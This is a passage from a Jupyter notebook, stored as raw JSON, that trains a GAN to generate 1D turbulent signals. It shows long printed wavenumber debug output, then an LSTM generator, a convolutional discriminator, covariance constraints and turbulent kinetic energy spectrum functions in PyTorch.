58\nk = 59\nk = 60\nk = 61\nk = 62\nk = 63\nk = 64\nk = 65\nk = 66\nk = 65\nk = 64\nk = 63\nk = 62\nk = 61\nk = 60\nk = 59\nk = 58\nk = 57\nk = 56\nk = 55\nk = 54\nk = 53\nk = 52\nk = 51\nk = 50\nk = 49\nk = 48\nk = 47\nk = 46\nk = 45\nk = 44\nk = 43\nk = 42\nk = 41\nk = 41\nk = 40\nk = 39\nk = 38\nk = 37\nk = 36\nk = 35\nk = 34\nk = 33\nk = 32\nk = 31\nk = 30\nk = 30\nk = 29\nk = 28\nk = 27\nk = 26\nk = 25\nk = 24\nk = 24\nk = 23\nk = 22\nk = 21\nk = 21\nk = 20\nk = 19\nk = 18\nk = 18\nk = 17\nk = 17\nk = 16\nk = 16\nk = 15\nk = 15\nk = 15\nk = 14\nk = 14\nk = 14\nk = 13\nk = 13\nk = 13\nk = 13\nk = 14\nk = 14\nk = 14\nk = 15\nk = 15\nk = 16\nk = 16\nk = 17\nk = 18\nk = 18\nk = 19\nk = 20\nk = 21\nk = 21\nk = 22\nk = 23\nk = 24\nk = 25\nk = 26\nk = 26\nk = 27\nk = 28\nk = 29\nk = 30\nk = 31\nk = 32\nk = 33\nk = 34\nk = 35\nk = 35\nk = 36\nk = 37\nk = 38\nk = 39\nk = 40\nk = 41\nk = 42\nk = 43\nk = 44\nk = 45\nk = 46\nk = 47\nk = 48\nk = 49\nk = 50\nk = 51\nk = 52\nk = 53\nk = 54\nk = 55\nk = 56\nk = 57\nk = 57\nk = 58\nk = 59\nk = 60\nk = 61\nk = 62\nk = 63\nk = 64\nk = 65\nk = 64\nk = 63\nk = 62\nk = 61\nk = 60\nk = 59\nk = 58\nk = 57\nk = 57\nk = 56\nk = 55\nk = 54\nk = 53\nk = 52\nk = 51\nk = 50\nk = 49\nk = 48\nk = 47\nk = 46\nk = 45\nk = 44\nk = 43\nk = 42\nk = 41\nk = 40\nk = 39\nk = 38\nk = 37\nk = 36\nk = 35\nk = 35\nk = 34\nk = 33\nk = 32\nk = 31\nk = 30\nk = 29\nk = 28\nk = 27\nk = 26\nk = 26\nk = 25\nk = 24\nk = 23\nk = 22\nk = 21\nk = 21\nk = 20\nk = 19\nk = 18\nk = 18\nk = 17\nk = 16\nk = 16\nk = 15\nk = 15\nk = 14\nk = 14\nk = 14\nk = 13\nk = 13\nk = 13\nk = 12\nk = 12\nk = 12\nk = 12\nk = 13\nk = 13\nk = 13\nk = 14\nk = 14\nk = 15\nk = 16\nk = 16\nk = 17\nk = 18\nk = 18\nk = 19\nk = 20\nk = 21\nk = 22\nk = 22\nk = 23\nk = 24\nk = 25\nk = 26\nk = 27\nk = 28\nk = 29\nk = 30\nk = 30\nk = 31\nk = 32\nk = 33\nk = 34\nk = 35\nk = 36\nk = 37\nk = 38\nk = 39\nk = 40\nk = 41\nk = 42\nk = 43\nk = 44\nk = 45\nk = 46\nk = 47\nk = 48\nk = 49\nk = 49\nk = 50\nk = 51\nk = 52\nk = 53\nk = 54\nk = 55\nk = 56\nk = 57\nk = 58\nk = 59\nk = 60\nk = 61\nk = 62\nk = 63\nk = 64\nk = 65\nk = 64\nk = 63\nk = 62\nk = 61\nk = 60\nk = 59\nk = 58\nk = 57\nk = 56\nk = 55\nk = 54\nk = 53\nk = 52\nk = 51\nk = 50\nk = 49\nk = 49\nk = 48\nk = 47\nk = 46\nk = 45\nk = 44\nk = 43\nk = 42\nk = 41\nk = 40\nk = 39\nk = 38\nk = 37\nk = 36\nk = 35\nk = 34\nk = 33\nk = 32\nk = 31\nk = 30\nk = 30\nk = 29\nk = 28\nk = 27\nk = 26\nk = 25\nk = 24\nk = 23\nk = 22\nk = 22\nk = 21\nk = 20\nk = 19\nk = 18\nk = 18\nk = 17\nk = 16\nk = 16\nk = 15\nk = 14\nk = 14\nk = 13\nk = 13\nk = 13\nk = 12\nk = 12\nk = 12\nk = 11\nk = 11\nk = 11\nk = 11\nk = 12\nk = 12\nk = 13\nk = 13\nk = 14\nk = 14\nk = 15\nk = 16\nk = 16\nk = 17\nk = 18\nk = 19\nk = 19\nk = 20\nk = 21\nk = 22\nk = 23\nk = 24\nk = 25\nk = 26\nk = 26\nk = 27\nk = 28\nk = 29\nk = 30\nk = 31\nk = 32\nk = 33\nk = 34\nk = 35\nk = 36\nk = 37\nk = 38\nk = 39\nk = 40\nk = 41\nk = 41\nk = 42\nk = 43\nk = 44\nk = 45\nk = 46\nk = 47\nk = 48\nk = 49\nk = 50\nk = 51\nk = 52\nk = 53\nk = 54\nk = 55\nk = 56\nk = 57\nk = 58\nk = 59\nk = 60\nk = 61\nk = 62\nk = 63\nk = 64\nk = 65\nk = 64\nk = 63\nk = 62\nk = 61\nk = 60\nk = 59\nk = 58\nk = 57\nk = 56\nk = 55\nk = 54\nk = 53\nk = 52\nk = 51\nk = 50\nk = 49\nk = 48\nk = 47\nk = 46\nk = 45\nk = 44\nk = 43\nk = 42\nk = 41\nk = 41\nk = 40\nk = 39\nk = 38\nk = 37\nk = 36\nk = 35\nk = 34\nk = 33\nk = 32\nk = 31\nk = 30\nk = 29\nk = 28\nk = 27\nk = 26\nk = 26\nk = 25\nk = 24\nk = 23\nk = 22\nk = 21\nk = 20\nk = 19\nk = 19\nk = 18\nk = 17\nk = 16\nk = 16\nk = 15\nk = 14\nk = 14\nk = 13\nk = 13\nk = 12\nk = 12\nk = 11\nk = 11\nk = 11\nk = 10\nk = 10\nk = 10\nk = 10\nk = 11\nk = 11\nk = 12\nk = 12\nk = 13\nk = 13\nk = 14\nk = 15\nk = 16\nk = 16\nk = 17\nk = 18\nk = 19\nk = 20\nk = 21\nk = 21\nk = 22\nk = 23\nk = 24\nk = 25\nk = 26\nk = 27\nk = 28\nk = 29\nk = 30\nk = 31\nk = 32\nk = 33\nk = 34\nk = 34\nk = 35\nk = 36\nk = 37\nk = 38\nk = 39\nk = 40\nk = 41\nk = 42\nk = 43\nk = 44\nk = 45\nk = 46\nk = 47\nk = 48\nk = 49\nk = 50\nk = 51\nk = 52\nk = 53\nk = 54\nk = 55\nk = 56\nk = 57\nk = 58\nk = 59\nk = 60\nk = 61\nk = 62\nk = 63\nk = 64\nk = 65\nk = 64\nk = 63\nk = 62\nk = 61\nk = 60\nk = 59\nk = 58\nk = 57\nk = 56\nk = 55\nk = 54\nk = 53\nk = 52\nk = 51\nk = 50\nk = 49\nk = 48\nk = 47\nk = 46\nk = 45\nk = 44\nk = 43\nk = 42\nk = 41\nk = 40\nk = 39\nk = 38\nk = 37\nk = 36\nk = 35\nk = 34\nk = 34\nk = 33\nk = 32\nk = 31\nk = 30\nk = 29\nk = 28\nk = 27\nk = 26\nk = 25\nk = 24\nk = 23\nk = 22\nk = 21\nk = 21\nk = 20\nk = 19\nk = 18\nk = 17\nk = 16\nk = 16\nk = 15\nk = 14\nk = 13\nk = 13\nk = 12\nk = 12\nk = 11\nk = 11\nk = 10\nk = 10\nk = 10\nk = 9\nk = 9\nk = 9\nk = 10\nk = 10\nk = 10\nk = 11\nk = 11\nk = 12\nk = 13\nk = 13\nk = 14\nk = 15\nk = 16\nk = 17\nk = 18\nk = 18\nk = 19\nk = 20\nk = 21\nk = 22\nk = 23\nk = 24\nk = 25\nk = 26\nk = 27\nk = 28\nk = 28\nk = 29\nk = 30\nk = 31\nk = 32\nk = 33\nk = 34\nk = 35\nk = 36\nk = 37\nk = 38\nk = 39\nk = 40\nk = 41\nk = 42\nk = 43\nk = 44\nk = 45\nk = 46\nk = 47\nk = 48\nk = 49\nk = 50\nk = 51\nk = 52\nk = 53\nk = 54\nk = 55\nk = 56\nk = 57\nk = 58\nk = 59\nk = 60\nk = 61\nk = 62\nk = 63\nk = 64\nk = 65\nk = 64\nk = 63\nk = 62\nk = 61\nk = 60\nk = 59\nk = 58\nk = 57\nk = 56\nk = 55\nk = 54\nk = 53\nk = 52\nk = 51\nk = 50\nk = 49\nk = 48\nk = 47\nk = 46\nk = 45\nk = 44\nk = 43\nk = 42\nk = 41\nk = 40\nk = 39\nk = 38\nk = 37\nk = 36\nk = 35\nk = 34\nk = 33\nk = 32\nk = 31\nk = 30\nk = 29\nk = 28\nk = 28\nk = 27\nk = 26\nk = 25\nk = 24\nk = 23\nk = 22\nk = 21\nk = 20\nk = 19\nk = 18\nk = 18\nk = 17\nk = 16\nk = 15\nk = 14\nk = 13\nk = 13\nk = 12\nk = 11\nk = 11\nk = 10\nk = 10\nk = 10\nk = 9\nk = 9\nk = 8\nk = 8\nk = 8\nk = 9\nk = 9\nk = 9\nk = 10\nk = 11\nk = 11\nk = 12\nk = 13\nk = 14\nk = 14\nk = 15\nk = 16\nk = 17\nk = 18\nk = 19\nk = 20\nk = 21\nk = 22\nk = 22\nk = 23\nk = 24\nk = 25\nk = 26\nk = 27\nk = 28\nk = 29\nk = 30\nk = 31\nk = 32\nk = 33\nk = 34\nk = 35\nk = 36\nk = 37\nk = 38\nk = 39\nk = 40\nk = 41\nk = 42\nk = 43\nk = 44\nk = 45\nk = 46\nk = 47\nk = 48\nk = 49\nk = 50\nk = 51\nk = 52\nk = 53\nk = 54\nk = 55\nk = 56\nk = 57\nk = 58\nk = 59\nk = 60\nk = 61\nk = 62\nk = 63\nk = 64\nk = 65\nk = 64\nk = 63\nk = 62\nk = 61\nk = 60\nk = 59\nk = 58\nk = 57\nk = 56\nk = 55\nk = 54\nk = 53\nk = 52\nk = 51\nk = 50\nk = 49\nk = 48\nk = 47\nk = 46\nk = 45\nk = 44\nk = 43\nk = 42\nk = 41\nk = 40\nk = 39\nk = 38\nk = 37\nk = 36\nk = 35\nk = 34\nk = 33\nk = 32\nk = 31\nk = 30\nk = 29\nk = 28\nk = 27\nk = 26\nk = 25\nk = 24\nk = 23\nk = 22\nk = 22\nk = 21\nk = 20\nk = 19\nk = 18\nk = 17\nk = 16\nk = 15\nk = 14\nk = 14\nk = 13\nk = 12\nk = 11\nk = 11\nk = 10\nk = 9\nk = 9\nk = 9\nk = 8\nk = 8\nk = 7\nk = 7\nk = 7\nk = 8\nk = 8\nk = 9\nk = 9\nk = 10\nk = 11\nk = 11\nk = 12\nk = 13\nk = 14\nk = 15\nk = 16\nk = 17\nk = 17\nk = 18\nk = 19\nk = 20\nk = 21\nk = 22\nk = 23\nk = 24\nk = 25\nk = 26\nk = 27\nk = 28\nk = 29\nk = 30\nk = 31\nk = 32\nk = 33\nk = 34\nk = 35\nk = 36\nk = 37\nk = 38\nk = 39\nk = 40\nk = 41\nk = 42\nk = 43\nk = 44\nk = 45\nk = 46\nk = 47\nk = 48\nk = 49\nk = 50\nk = 50\nk = 51\nk = 52\nk = 53\nk = 54\nk = 55\nk = 56\nk = 57\nk = 58\nk = 59\nk = 60\nk = 61\nk = 62\nk = 63\nk = 64\nk = 63\nk = 62\nk = 61\nk = 60\nk = 59\nk = 58\nk = 57\nk = 56\nk = 55\nk = 54\nk = 53\nk = 52\nk = 51\nk = 50\nk = 50\nk = 49\nk = 48\nk = 47\nk = 46\nk = 45\nk = 44\nk = 43\nk = 42\nk = 41\nk = 40\nk = 39\nk = 38\nk = 37\nk = 36\nk = 35\nk = 34\nk = 33\nk = 32\nk = 31\nk = 30\nk = 29\nk = 28\nk = 27\nk = 26\nk = 25\nk = 24\nk = 23\nk = 22\nk = 21\nk = 20\nk = 19\nk = 18\nk = 17\nk = 17\nk = 16\nk = 15\nk = 14\nk = 13\nk = 12\nk = 11\nk = 11\nk = 10\nk = 9\nk = 9\nk = 8\nk = 8\nk = 7\nk = 7\nk = 6\nk = 6\nk = 6\nk = 7\nk = 7\nk = 8\nk = 9\nk = 9\nk = 10\nk = 11\nk = 12\nk = 13\nk = 13\nk = 14\nk = 15\nk = 16\nk = 17\nk = 18\nk = 19\nk = 20\nk = 21\nk = 22\nk = 23\nk = 24\nk = 25\nk = 26\nk = 27\nk = 28\nk = 29\nk = 30\nk = 31\nk = 32\nk = 33\nk = 34\nk = 35\nk = 36\nk = 37\nk = 37\nk = 38\nk = 39\nk = 40\nk = 41\nk = 42\nk = 43\nk = 44\nk = 45\nk = 46\nk = 47\nk = 48\nk = 49\nk = 50\nk = 51\nk = 52\nk = 53\nk = 54\nk = 55\nk = 56\nk = 57\nk = 58\nk = 59\nk = 60\nk = 61\nk = 62\nk = 63\nk = 64\nk = 63\nk = 62\nk = 61\nk = 60\nk = 59\nk = 58\nk = 57\nk = 56\nk = 55\nk = 54\nk = 53\nk = 52\nk = 51\nk = 50\nk = 49\nk = 48\nk = 47\nk = 46\nk = 45\nk = 44\nk = 43\nk = 42\nk = 41\nk = 40\nk = 39\nk = 38\nk = 37\nk = 37\nk = 36\nk = 35\nk = 34\nk = 33\nk = 32\nk = 31\nk = 30\nk = 29\nk = 28\nk = 27\nk = 26\nk = 25\nk = 24\nk = 23\nk = 22\nk = 21\nk = 20\nk = 19\nk = 18\nk = 17\nk = 16\nk = 15\nk = 14\nk = 13\nk = 13\nk = 12\nk = 11\nk = 10\nk = 9\nk = 9\nk = 8\nk = 7\nk = 7\nk = 6\nk = 6\nk = 5\nk = 5\nk = 5\nk = 6\nk = 6\nk = 7\nk = 8\nk = 9\nk = 9\nk = 10\nk = 11\nk = 12\nk = 13\nk = 14\nk = 15\nk = 16\nk = 17\nk = 18\nk = 19\nk = 20\nk = 21\nk = 22\nk = 23\nk = 24\nk = 25\nk = 26\nk = 26\nk = 27\nk = 28\nk = 29\nk = 30\nk = 31\nk = 32\nk = 33\nk = 34\nk = 35\nk = 36\nk = 37\nk = 38\nk = 39\nk = 40\nk = 41\nk = 42\nk = 43\nk = 44\nk = 45\nk = 46\nk = 47\nk = 48\nk = 49\nk = 50\nk = 51\nk = 52\nk = 53\nk = 54\nk = 55\nk = 56\nk = 57\nk = 58\nk = 59\nk = 60\nk = 61\nk = 62\nk = 63\nk = 64\nk = 63\nk = 62\nk = 61\nk = 60\nk = 59\nk = 58\nk = 57\nk = 56\nk = 55\nk = 54\nk = 53\nk = 52\nk = 51\nk = 50\nk = 49\nk = 48\nk = 47\nk = 46\nk = 45\nk = 44\nk = 43\nk = 42\nk = 41\nk = 40\nk = 39\nk = 38\nk = 37\nk = 36\nk = 35\nk = 34\nk = 33\nk = 32\nk = 31\nk = 30\nk = 29\nk = 28\nk = 27\nk = 26\nk = 26\nk = 25\nk = 24\nk = 23\nk = 22\nk = 21\nk = 20\nk = 19\nk = 18\nk = 17\nk = 16\nk = 15\nk = 14\nk = 13\nk = 12\nk = 11\nk = 10\nk = 9\nk = 9\nk = 8\nk = 7\nk = 6\nk = 6\nk = 5\nk = 5\nk = 4\nk = 4\nk = 5\nk = 5\nk = 6\nk = 6\nk = 7\nk = 8\nk = 9\nk = 10\nk = 11\nk = 12\nk = 13\nk = 14\nk = 15\nk = 16\nk = 17\nk = 17\nk = 18\nk = 19\nk = 20\nk = 21\nk = 22\nk = 23\nk = 24\nk = 25\nk = 26\nk = 27\nk = 28\nk = 29\nk = 30\nk = 31\nk = 32\nk = 33\nk = 34\nk = 35\nk = 36\nk = 37\nk = 38\nk = 39\nk = 40\nk = 41\nk = 42\nk = 43\nk = 44\nk = 45\nk = 46\nk = 47\nk = 48\nk = 49\nk = 50\nk = 51\nk = 52\nk = 53\nk = 54\nk = 55\nk = 56\nk = 57\nk = 58\nk = 59\nk = 60\nk = 61\nk = 62\nk = 63\nk = 64\nk = 63\nk = 62\nk = 61\nk = 60\nk = 59\nk = 58\nk = 57\nk = 56\nk = 55\nk = 54\nk = 53\nk = 52\nk = 51\nk = 50\nk = 49\nk = 48\nk = 47\nk = 46\nk = 45\nk = 44\nk = 43\nk = 42\nk = 41\nk = 40\nk = 39\nk = 38\nk = 37\nk = 36\nk = 35\nk = 34\nk = 33\nk = 32\nk = 31\nk = 30\nk = 29\nk = 28\nk = 27\nk = 26\nk = 25\nk = 24\nk = 23\nk = 22\nk = 21\nk = 20\nk = 19\nk = 18\nk = 17\nk = 17\nk = 16\nk = 15\nk = 14\nk = 13\nk = 12\nk = 11\nk = 10\nk = 9\nk = 8\nk = 7\nk = 6\nk = 6\nk = 5\nk = 5\nk = 4\nk = 3\nk = 3\nk = 4\nk = 4\nk = 5\nk = 6\nk = 7\nk = 8\nk = 9\nk = 10\nk = 10\nk = 11\nk = 12\nk = 13\nk = 14\nk = 15\nk = 16\nk = 17\nk = 18\nk = 19\nk = 20\nk = 21\nk = 22\nk = 23\nk = 24\nk = 25\nk = 26\nk = 27\nk = 28\nk = 29\nk = 30\nk = 31\nk = 32\nk = 33\nk = 34\nk = 35\nk = 36\nk = 37\nk = 38\nk = 39\nk = 40\nk = 41\nk = 42\nk = 43\nk = 44\nk = 45\nk = 46\nk = 47\nk = 48\nk = 49\nk = 50\nk = 51\nk = 52\nk = 53\nk = 54\nk = 55\nk = 56\nk = 57\nk = 58\nk = 59\nk = 60\nk = 61\nk = 62\nk = 63\nk = 64\nk = 63\nk = 62\nk = 61\nk = 60\nk = 59\nk = 58\nk = 57\nk = 56\nk = 55\nk = 54\nk = 53\nk = 52\nk = 51\nk = 50\nk = 49\nk = 48\nk = 47\nk = 46\nk = 45\nk = 44\nk = 43\nk = 42\nk = 41\nk = 40\nk = 39\nk = 38\nk = 37\nk = 36\nk = 35\nk = 34\nk = 33\nk = 32\nk = 31\nk = 30\nk = 29\nk = 28\nk = 27\nk = 26\nk = 25\nk = 24\nk = 23\nk = 22\nk = 21\nk = 20\nk = 19\nk = 18\nk = 17\nk = 16\nk = 15\nk = 14\nk = 13\nk = 12\nk = 11\nk = 10\nk = 10\nk = 9\nk = 8\nk = 7\nk = 6\nk = 5\nk = 4\nk = 4\nk = 3\nk = 2\nk = 2\nk = 3\nk = 4\nk = 5\nk = 5\nk = 6\nk = 7\nk = 8\nk = 9\nk = 10\nk = 11\nk = 12\nk = 13\nk = 14\nk = 15\nk = 16\nk = 17\nk = 18\nk = 19\nk = 20\nk = 21\nk = 22\nk = 23\nk = 24\nk = 25\nk = 26\nk = 27\nk = 28\nk = 29\nk = 30\nk = 31\nk = 32\nk = 33\nk = 34\nk = 35\nk = 36\nk = 37\nk = 38\nk = 39\nk = 40\nk = 41\nk = 42\nk = 43\nk = 44\nk = 45\nk = 46\nk = 47\nk = 48\nk = 49\nk = 50\nk = 51\nk = 52\nk = 53\nk = 54\nk = 55\nk = 56\nk = 57\nk = 58\nk = 59\nk = 60\nk = 61\nk = 62\nk = 63\nk = 64\nk = 63\nk = 62\nk = 61\nk = 60\nk = 59\nk = 58\nk = 57\nk = 56\nk = 55\nk = 54\nk = 53\nk = 52\nk = 51\nk = 50\nk = 49\nk = 48\nk = 47\nk = 46\nk = 45\nk = 44\nk = 43\nk = 42\nk = 41\nk = 40\nk = 39\nk = 38\nk = 37\nk = 36\nk = 35\nk = 34\nk = 33\nk = 32\nk = 31\nk = 30\nk = 29\nk = 28\nk = 27\nk = 26\nk = 25\nk = 24\nk = 23\nk = 22\nk = 21\nk = 20\nk = 19\nk = 18\nk = 17\nk = 16\nk = 15\nk = 14\nk = 13\nk = 12\nk = 11\nk = 10\nk = 9\nk = 8\nk = 7\nk = 6\nk = 5\nk = 5\nk = 4\nk = 3\nk = 2\nk = 1\nk = 2\nk = 2\nk = 3\nk = 4\nk = 5\nk = 6\nk = 7\nk = 8\nk = 9\nk = 10\nk = 11\nk = 12\nk = 13\nk = 14\nk = 15\nk = 16\nk = 17\nk = 18\nk = 19\nk = 20\nk = 21\nk = 22\nk = 23\nk = 24\nk = 25\nk = 26\nk = 27\nk = 28\nk = 29\nk = 30\nk = 31\nk = 32\nk = 33\nk = 34\nk = 35\nk = 36\nk = 37\nk = 38\nk = 39\nk = 40\nk = 41\nk = 42\nk = 43\nk = 44\nk = 45\nk = 46\nk = 47\nk = 48\nk = 49\nk = 50\nk = 51\nk = 52\nk = 53\nk = 54\nk = 55\nk = 56\nk = 57\nk = 58\nk = 59\nk = 60\nk = 61\nk = 62\nk = 63\nk = 64\nk = 63\nk = 62\nk = 61\nk = 60\nk = 59\nk = 58\nk = 57\nk = 56\nk = 55\nk = 54\nk = 53\nk = 52\nk = 51\nk = 50\nk = 49\nk = 48\nk = 47\nk = 46\nk = 45\nk = 44\nk = 43\nk = 42\nk = 41\nk = 40\nk = 39\nk = 38\nk = 37\nk = 36\nk = 35\nk = 34\nk = 33\nk = 32\nk = 31\nk = 30\nk = 29\nk = 28\nk = 27\nk = 26\nk = 25\nk = 24\nk = 23\nk = 22\nk = 21\nk = 20\nk = 19\nk = 18\nk = 17\nk = 16\nk = 15\nk = 14\nk = 13\nk = 12\nk = 11\nk = 10\nk = 9\nk = 8\nk = 7\nk = 6\nk = 5\nk = 4\nk = 3\nk = 2\nk = 2\n" ], [ "plt.xscale('log')\nplt.plot(wave_numbers,tke_spectrum)", "_____no_output_____" ] ], [ [ "#Learning 1D Turbulent signal with GAN\n ", "_____no_output_____" ] ], [ [ "# Set random seem for reproducibility\nmanualSeed = 999\n#manualSeed = random.randint(1, 10000) # use if you want new results\nprint(\"Random Seed: \", manualSeed)\nrandom.seed(manualSeed)\ntorch.manual_seed(manualSeed)", "Random Seed: 999\n" ], [ "# Batch size during training\nbatch_size = 128\n\n# Size of z latent vector (i.e. size of generator input)\nnz = 1\n\n# Number of training epochs\nnum_epochs = 40\n\n# Learning rate for optimizers\nlr = 0.0001\n\n# Beta1 hyperparam for Adam optimizers\nbeta1 = 0.0\n\n# Number of GPUs available. Use 0 for CPU mode.\nngpu = 1\n\nncritic = 5", "_____no_output_____" ], [ "#Create Dataset\ndataset = torch.utils.data.TensorDataset(train_sigs)\n#Create DataLoader\ndataloader = torch.utils.data.DataLoader(dataset, batch_size=batch_size,\n shuffle=True)", "_____no_output_____" ], [ "# Decide which device we want to run on\ndevice = torch.device(\"cuda:0\" if (torch.cuda.is_available() and ngpu > 0) else \"cpu\")", "_____no_output_____" ], [ "# custom weights initialization called on netG and netD\ndef weights_init(m):\n classname = m.__class__.__name__\n if classname.find('Linear') != -1:\n nn.init.normal_(m.weight.data, 0.0, 0.02)\n elif classname.find('Conv') != -1:\n nn.init.normal_(m.weight.data, 0.0, 0.02)", "_____no_output_____" ] ], [ [ "## Generator", "_____no_output_____" ] ], [ [ "class Generator(nn.Module):\n def __init__(self,ngpu):\n super(Generator, self).__init__()\n self.ngpu = ngpu\n self.hidden_dim = 256\n self.lstm_cell = nn.LSTMCell(1+1,self.hidden_dim)\n self.fc2 = nn.Sequential(\n nn.Linear(self.hidden_dim,1,bias=False),\n )\n def init_hidden(self, batch_size):\n ''' Initialize hidden state '''\n # create NEW tensor with SAME TYPE as weight\n weight = next(self.parameters()).data\n\n if (self.ngpu >= 1):\n \n hidden = ((weight.new(batch_size, self.hidden_dim).normal_(mean=0,std=0.2).cuda(),\n weight.new(batch_size, self.hidden_dim).normal_(mean=0,std=0.2).cuda()),\n (weight.new(batch_size, self.hidden_dim).normal_(mean=0,std=0.2).cuda(),\n weight.new(batch_size, self.hidden_dim).normal_(mean=0,std=0.2).cuda()))\n\n else:\n hidden = ((weight.new(batch_size, self.hidden_dim).normal_(mean=0,std=0.2),\n weight.new(batch_size, self.hidden_dim).normal_(mean=0,std=0.2)),\n (weight.new(batch_size, self.hidden_dim).normal_(mean=0,std=0.2),\n weight.new(batch_size, self.hidden_dim).normal_(mean=0,std=0.2)))\n\n return hidden\n def forward(self, z, n_points):\n l_size = z.size()\n output = torch.empty((l_size[0],l_size[1],n_points)).to(device)\n for j in range(z.shape[1]):\n h_0 = torch.randn(l_size[0],self.hidden_dim).to(device)\n c_0 = torch.randn(l_size[0],self.hidden_dim).to(device)\n y_0 = torch.randn((l_size[0],1)).to(device)*0.2\n seq = y_0\n for i in range(n_points-1):\n noise = torch.cat((z[:,j,i].unsqueeze(1),y_0),dim=1)\n h_0, c_0 = self.lstm_cell(noise,(h_0,c_0))\n y_0 = self.fc2(h_0)\n seq = torch.cat((seq,y_0),dim=1)\n seq = torch.reshape(seq,(l_size[0],n_points))\n output[:,j,:] = seq\n return output", "_____no_output_____" ], [ "# Create the generator\nnetG = Generator(ngpu).to(device)\n\n# Handle multi-gpu if desired\nif (device.type == 'cuda') and (ngpu > 1):\n netG = nn.DataParallel(netG, list(range(ngpu)))\n\nnetG.apply(weights_init)\n\n# Print the model\nprint(netG)", "Generator(\n (lstm_cell): LSTMCell(2, 256)\n (fc2): Sequential(\n (0): Linear(in_features=256, out_features=1, bias=False)\n )\n)\n" ], [ "z = torch.randn(128,1,128,device=device)\ngen_sig = netG(z,128)\nplt.plot(gen_sig[0,0,:].cpu().detach().numpy())", "_____no_output_____" ] ], [ [ "## Discriminator", "_____no_output_____" ] ], [ [ "class Discriminator(nn.Module):\n def __init__(self, ngpu):\n super(Discriminator, self).__init__()\n self.ngpu = ngpu\n self.main = nn.Sequential(\n # input is nz x 1 x 1\n (nn.Conv2d(128, 64 * 4, (5,1), (2,1), (2,0), bias=False)),\n nn.LeakyReLU(0.2,inplace=True),\n # state size. (ndf*2) x 1 x 1\n (nn.Conv2d(64 * 4, 64 * 2, (5,1), (2,1), (2,0), bias=False)),\n nn.LeakyReLU(0.2,inplace=True),\n # state size. (ndf*4) x 1 x 1\n (nn.Conv2d(64 * 2, 64, (5,1), (2,1), (2,0), bias=False)),\n nn.LeakyReLU(0.2,inplace=True),\n (nn.Conv2d(64, 1, (5,1), (2,1), (2,0), bias=False)),\n \n )\n\n def forward(self, noise):\n l_size = noise.size()\n noise = torch.reshape(noise,(l_size[0],128,l_size[1],1))\n return self.main(noise)", "_____no_output_____" ], [ "# Create the Discriminator\nnetD = Discriminator(ngpu).to(device)\n\n# Handle multi-gpu if desired\nif (device.type == 'cuda') and (ngpu > 1):\n netD = nn.DataParallel(netD, list(range(ngpu)))\n\nnetD.apply(weights_init)\n\n# Print the model\nprint(netD)", "Discriminator(\n (main): Sequential(\n (0): Conv2d(128, 256, kernel_size=(5, 1), stride=(2, 1), padding=(2, 0), bias=False)\n (1): LeakyReLU(negative_slope=0.2, inplace=True)\n (2): Conv2d(256, 128, kernel_size=(5, 1), stride=(2, 1), padding=(2, 0), bias=False)\n (3): LeakyReLU(negative_slope=0.2, inplace=True)\n (4): Conv2d(128, 64, kernel_size=(5, 1), stride=(2, 1), padding=(2, 0), bias=False)\n (5): LeakyReLU(negative_slope=0.2, inplace=True)\n (6): Conv2d(64, 1, kernel_size=(5, 1), stride=(2, 1), padding=(2, 0), bias=False)\n )\n)\n" ], [ "prob = netD(train_sigs.to(device))\nprint(prob.mean())\nprint(prob)", "tensor(-0.0002, device='cuda:0', grad_fn=<MeanBackward0>)\ntensor([[[[-0.0006]]],\n\n\n [[[-0.0004]]],\n\n\n [[[-0.0003]]],\n\n\n ...,\n\n\n [[[-0.0001]]],\n\n\n [[[-0.0002]]],\n\n\n [[[-0.0003]]]], device='cuda:0', grad_fn=<CudnnConvolutionBackward>)\n" ] ], [ [ "## GAN", "_____no_output_____" ] ], [ [ "# Initialize loss function\ndef criterion(y):\n return torch.mean(y)\n# Setup Adam optimizers for both G and D\nbetas=(beta1, 0.9)\noptimizerD = optim.Adam(netD.parameters(), lr=lr,betas=betas)\noptimizerG = optim.Adam(netG.parameters(), lr=lr,betas=betas)", "_____no_output_____" ], [ "mean_real = torch.mean(train_sigs,dim=0)\ndef stat_constraint(x):\n meanx = torch.mean(x,dim=0)\n meany = mean_real.to(device)\n return torch.norm(meanx-meany)", "_____no_output_____" ], [ "def cov(y):\n b_size = y.shape[0]\n y = y.unsqueeze(-1)\n yt = torch.transpose(y,-2,-1)\n sigma = torch.mean(torch.matmul(y,yt),dim=0)-torch.matmul(torch.mean(y,dim=0),torch.mean(yt,dim=0))\n return sigma", "_____no_output_____" ], [ "cov(train_sigs).shape", "_____no_output_____" ], [ "def stat_constraint4(x,y):\n sigmax = (cov(x))\n sigmay = (cov(y))\n return torch.norm(sigmax-sigmay)", "_____no_output_____" ], [ "def score(x,y):\n covx = torch.mean(cov(x),dim=0)\n covy = torch.mean(cov(y),dim=0)\n term1 = torch.mean(((torch.mean(x,dim=1)-torch.mean(y,dim=1))**2)**0.5)\n term2 = torch.trace(covx+covy-2*(covx*covy)**0.5)\n return term1 + term2", "_____no_output_____" ], [ "def spec_1D(u,lx,ly,lz,smooth=False):\n nx = u.shape[1]\n ny = u.shape[2]\n nz = u.shape[3]\n\n nt = nx * ny * nz\n n = max(nx, ny, nz)\n uh = torch.rfft(u,3,onesided=False) / nt\n\n tkeh = 0.5 * (uh[:,:,:,:,0]**2+uh[:,:,:,:,1]**2)\n\n length = max(lx, ly, lz)\n\n knorm = 2.0 * np.pi / length\n\n kxmax = nx / 2\n kymax = ny / 2\n kzmax = nz / 2\n\n wave_numbers = knorm * np.arange(0, n)\n tke_spectrum = torch.zeros(u.shape[0],len(wave_numbers)).to(device)\n if nx==ny==nz :\n for kx in range(-nx//2, nx//2-1):\n for ky in range(-ny//2, ny//2-1):\n for kz in range(-nz//2, nz//2-1):\n rk = np.sqrt(kx**2 + ky**2 + kz**2)\n k = int(np.round(rk))\n tke_spectrum[:,k] += tkeh[:,kx, ky, kz]\n else:\n tke_spectrum = tkeh\n \n\n tke_spectrum = tke_spectrum / knorm\n if smooth == True:\n tke_spectrum = torch.reshape(tke_spectrum,(u.shape[0],1,n))\n window = torch.ones(1,1,5).to(device) / 5\n tkespecsmooth = nn.functional.conv1d(tke_spectrum,window,padding=2)\n tkespecsmooth[:,:,0:4] = tke_spectrum[:,:,0:4]\n tke_spectrum = tkespecsmooth\n if nx==ny==nz:\n return wave_numbers, torch.reshape(tke_spectrum,(u.shape[0],n))\n else:\n return wave_numbers, tke_spectrum", "_____no_output_____" ], [ "def spec(u,lx,smooth=True):\n n = u.shape[2]\n u = u.reshape(u.shape[0],u.shape[2])\n uh = 